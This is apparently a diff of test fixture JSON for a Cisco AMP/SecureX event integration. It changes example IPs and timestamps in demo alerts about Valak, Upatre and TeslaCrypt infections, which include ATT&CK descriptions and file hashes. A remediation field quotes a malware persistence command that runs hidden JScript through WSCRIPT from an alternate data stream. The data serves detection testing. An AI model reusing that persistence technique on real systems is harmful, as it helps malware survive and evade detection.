(Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. 
Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 
These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}",
+ "ingested": "2021-12-09T13:35:32.897992800Z",
+ "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting 
Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. 
Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). 
Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. 
Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
(Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. 
Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 
These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "code": "1107296344", "kind": "alert" }, @@ -67,7 +67,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "threat_hunting": { "severity": "critical", @@ -174,7 +174,7 @@ "70aef829bec17195e6c8ec0e6cba0ed39f97ba48" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -191,8 +191,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070128592Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898030200Z", + 
"original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -214,7 +214,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "parent": {
@@ -277,7 +277,7 @@
 "70aef829bec17195e6c8ec0e6cba0ed39f97ba48"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -294,8 +294,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070130825Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", + "ingested": "2021-12-09T13:35:32.898033800Z", + 
"original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -317,7 +317,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "parent": {
@@ -368,7 +368,7 @@
 "e654d39cd13414b5151e8cf0d8f5b166dddd45cb"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -382,8 +382,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070132933Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:32.898041500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat 